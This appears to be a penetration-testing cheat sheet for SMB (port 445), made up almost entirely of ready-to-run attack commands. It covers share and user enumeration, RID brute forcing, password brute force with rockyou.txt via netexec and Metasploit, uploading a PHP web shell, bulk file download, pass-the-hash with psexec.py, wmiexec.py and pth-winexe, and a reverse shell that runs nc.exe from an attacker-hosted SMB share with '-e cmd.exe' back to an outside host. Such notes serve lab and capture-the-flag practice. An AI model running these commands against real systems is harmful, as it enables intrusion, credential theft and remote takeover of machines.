Information

Default Port: 445

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Enumeration

netexec smb 192.168.1.2

enum4linux 192.168.1.2

nmap -p445 -sS 192.168.1.2
nmap -p445 -sVC 192.168.1.2
nmap -p445 --script="smb-vuln*" 192.168.1.2
nmap -p445 --script="vuln and safe" 192.168.1.2
nmap -p445 --script="smb-enum-*" 192.168.1.2

Check Credentials

# password
netexec smb 192.168.1.2 -u peter -p Password1
netexec smb 192.168.1.2 -u peter -p Password1 --local-auth
# hash
netexec smb 192.168.1.2 -u peter -H <HASH>
netexec smb 192.168.1.2 -u peter -H <HASH> --local-auth

Shares

List

Null

# default port
smbclient -NL //192.168.1.2
rpcclient -NU "" 192.168.1.2 -c "netshareenum"   # absolute path
# other port
smbclient -NL //192.168.1.2 -p 1234
# (ERROR -> protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED)
smbclient -NL //192.168.1.2 --option="client min protocol=NT1"

smbmap -H 192.168.1.2 --no-banner
smbmap -H 192.168.1.2 -u '' -p '' --no-banner
                                                               
netexec smb 192.168.1.2 --shares
netexec smb 192.168.1.2 -u '' -p '' --shares

Auth

smbclient -L //192.168.1.2 -U "peter%Password1"
smbmap -H 192.168.1.2 -u peter -p Password1
netexec smb 192.168.1.2 -u peter -p Password1 --shares
# hash
pth-smbclient -L 192.168.1.2 -U 'peter%00000000000000000000000000000000:3B4C57484504038C2F2E94861D507BA7'

Access

Null

smbclient -N //192.168.1.2/share
smbmap -H 192.168.1.2 -r share
netexec smb 192.168.1.2 -u '' -p '' --spider share --regex .
# space
smbclient -N //192.168.1.2/'my share'
# (ERROR -> protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED)
smbclient -N //192.168.1.2/share --option="client min protocol=NT1"

Auth

smbclient -N //192.168.1.2/share -U "peter%Password1"
netexec smb 192.168.1.2 -u peter -p Password1 --spider share --regex .
smbmap -H 192.168.1.2 -u peter -p Password1 -r share
# hash
pth-smbclient //192.168.1.2/share -U 'peter%00000000000000000000000000000000:3B4C57484504038C2F2E94861D507BA7'
smbclient //192.168.1.2/share -U peter --pw-nt-hash '3B4C57484504038C2F2E94861D507BA7'
smbclient //192.168.1.2/share -U peter --pw-nt-hash 'F9FE0310AF66C797A73CB60B1953FCD7' -p 1234

Upload

# file
smbclient -N //192.168.1.2/folder
smb: \> put cmd.php

# files
smbclient -N //192.168.1.2/folder
smb: \> mput *

Download

smbmap -H 192.168.1.2 --download SYSVOL/Groups/Groups.xml
smbmap -H 192.168.1.2 -u peter -p Password1 --download share/secret.txt --no-banner
smbmap -H 192.168.1.2 -u peter -p Password1 --download 'users$/mhope/azure.xml'
smbmap -H 192.168.1.2 -u 'guest' -p '' --download Public/'SQL Server Procedures.pdf'

# file
smbclient -N //192.168.1.2/folder
smb: \> get file.zip

# all files
smbclient -N //192.168.1.2/folder
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

netexec smb 10.129.228.253 -u 'guest' -p '' --share Public --get-file "SQL Server Procedures.pdf" "SQLServerProcedures.pdf"

smbget -R smb://192.168.1.2/folder$ -U "peter%Password1"

Mount (CIFS)

mkdir /mnt/samba

# null
mount -t cifs //192.168.1.2/share /mnt/samba
# auth
mount -t cifs //192.168.1.2/share /mnt/samba -o username=peter,password='Password123!',rw

cd /mnt/samba
tree
umount /mnt/samba

Users

netexec smb 192.168.1.74 -u users.dic -p Password1

netexec smb 192.168.1.74 --users
netexec smb 192.168.1.74 -u '' -p '' --users

rpcclient -U "" -N 192.168.1.2 -c "enumdomusers"
rpcclient -U "" -N 192.168.1.2 -c "querydispinfo; enumdomusers"
rpcclient -U "" -N 192.168.1.2 -c "querydispinfo; enumdomusers" | awk '{print $8}'

enum4linux -U 192.168.1.2

for i in $(cat usernames.dic); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupnames $i'" ;done | grep "User"

RID

netexec smb 192.168.1.2 --rid-brute
netexec smb 192.168.1.2 -u '' -p '' --rid-brute

Linux

rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupnames root'           # default port
rpcclient -W '' -U ''%'' 192.168.1.2 -p 1234 -c 'lookupnames root'   # other port

root S-1-22-1-0 (User: 1)
# default port
for i in $(seq 1000 1005); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupsids S-1-22-1-$i'" ;done
# other port
for i in $(seq 1000 1005); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.2 -p 1234 -c 'lookupsids S-1-22-1-$i'" ;done

S-1-22-1-1000 Unix User\dad (1)
S-1-22-1-1001 Unix User\mum (1)
S-1-22-1-1002 Unix User\baby (1)
S-1-22-1-1003 Unix User\1003 (1)
S-1-22-1-1004 Unix User\1004 (1)
S-1-22-1-1005 Unix User\1005 (1)

Windows

rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupnames administrator'
rpcclient -U 'administrator%Password123' 192.168.1.2 -c 'lookupnames administrador'

administrador S-1-5-21-172782897-4107608896-4177437455-500 (User: 1)
for i in $(seq 500 1150); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupsids S-1-5-21-172782897-4107608896-4177437455-$i'" ;done | grep -v "unknown"
for i in $(seq 500 1150); do bash -c "rpcclient -W '' -U 'administrador'%'Password123' 192.168.1.2 -c 'lookupsids S-1-5-21-172782897-4107608896-4177437455-$i'" ;done | grep -v "unknown"
for i in $(seq 500 1150); do bash -c "rpcclient -W '' -U 'administrador'%'Password123' 192.168.1.2 -c 'lookupsids S-1-5-21-172782897-4107608896-4177437455-$i'" ;done | grep -vE "unknown|\(2\)|\(4\)"

Brute Force

Password

NetExec

netexec smb 192.168.1.2 -u peter -p rockyou.txt
netexec smb 192.168.1.2 -u peter -p rockyou.txt --continue-on-success
netexec smb 192.168.1.2 -u peter -p rockyou.txt --continue-on-success --ignore-pw-decoding
netexec smb 192.168.1.2 -u peter -p rockyou.txt --continue-on-success --no-bruteforce

Metasploit

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOST 192.168.1.2
msf6 auxiliary(scanner/smb/smb_login) > set SMBuser peter
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > set VERBOSE false
msf6 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/smb/smb_login) > set THREADS 10
msf6 auxiliary(scanner/smb/smb_login) > run

PassTheHash (PtH)

pth-winexe -U WORKGROUP/admin%123456 //192.168.1.2 cmd.exe
pth-winexe -U WORKGROUP/admin%00000000000000000000000000000000:32ed87bdb5fdc5e9cba88547376818d4 //192.168.1.2 cmd.exe
wmiexec.py WORKGROUP/administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.129.1.147
impacket-psexec hutch.offsec/administrator:'xG/j06xg8TMg6I'@192.168.248.122
wmiexec.py WORKGROUP/administrator@10.129.1.147 -hashes ':2dcefe78334b42c0ce483b8e1b2886ab'
psexec.py domain.htb/admin:123456@192.168.1.2 cmd.exe
psexec.py WORKGROUP/admin@192.168.1.2 cmd.exe
psexec.py WORKGROUP/admin:123456@192.168.1.2 cmd.exe
psexec.py WORKGROUP/administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.129.1.147 cmd.exe
psexec.py -hashes ':32ed87bdb5fdc5e9cba88547376818d4' WORKGROUP/administrator@192.168.1.2 cmd.exe

Reverse Shell

locate nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .
impacket-smbserver a $(pwd)
rlwrap nc -lvnp 443

# -x COMMAND            execute the specified command
# -X PS_COMMAND         execute the specified PowerShell command
netexec smb 192.168.1.2 -u 'administrator' -p Password1 -x '\\192.168.1.3\a\nc.exe -e cmd.exe 192.168.1.3 443'
netexec smb 192.168.1.2 -u 'administrator' -p Password1 -X '\\192.168.1.3\a\nc.exe -e cmd.exe 192.168.1.3 443'